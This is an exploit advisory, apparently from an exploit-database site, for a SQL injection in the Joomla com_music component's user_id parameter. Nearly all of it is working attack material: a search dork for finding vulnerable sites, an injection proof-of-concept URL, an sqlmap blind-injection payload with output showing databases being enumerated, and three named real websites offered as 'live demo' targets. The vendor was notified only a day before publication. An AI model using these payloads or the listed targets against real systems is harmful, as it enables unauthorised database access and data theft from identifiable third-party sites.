Joomla com_music SQL injection Vulnerability

2016.07.17
Credit: xBADGIRL21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Joomla com_music SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_music # Vendor Homepage : http://www.raindropsinfotech.com/ # version : 1.0.0 # Tested on: [ Kali Linux 2.0 ] # skype:xbadgirl21 # Date: 2016/07/15 # video Proof : https://www.youtube.com/watch?v=RNjp-FaiNiw ###################### # [+] DESCRIPTION : ###################### # [+] an SQL injection been Detected in this Joomla components music after you add ['] or ["] to # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL # [+] server version for the right syntax to use near ''' at line 1 SQL=SELECT ###################### # [+] Poc : ###################### # [user_id] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=99999999'&lang=en ###################### # [+] SQLmap PoC: ###################### #Parameter: user_id (GET) # Type: boolean-based blind # Title: MySQL >= 5.0 boolean-based blind - Parameter replace # Payload: option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=(SELECT (CASE WHEN (1963=1963) THEN 1963 ELSE 1963*(SELECT 1963 FROM #INFORMATION_SCHEMA.CHARACTER_SETS) END))&lang=en # [14:18:22] [INFO] GET parameter 'user_id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable # [14:22:39] [INFO] the back-end DBMS is MySQL # web application technology: Apache # back-end DBMS: MySQL 5.0 # [14:22:39] [INFO] fetching database names # [14:22:43] [INFO] the SQL query used returns 2 entries ###################### # [+] Live Demo : ###################### # http://saborcristiano.com/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=184'&lang=en # http://www.radiosaborcristiano.net/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=100'&lang=en # http://www.christianflavor.com/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=1'&lang=en ####################### # Disclosure Timeline: #====================== # [+]Exploit Discovered [15-07-2016] # [+]Vendor Notified [15-07-2016]: No reply # [+]Exploit Published [16-07-2016] ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://www.youtube.com/watch?v=RNjp-FaiNiw


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top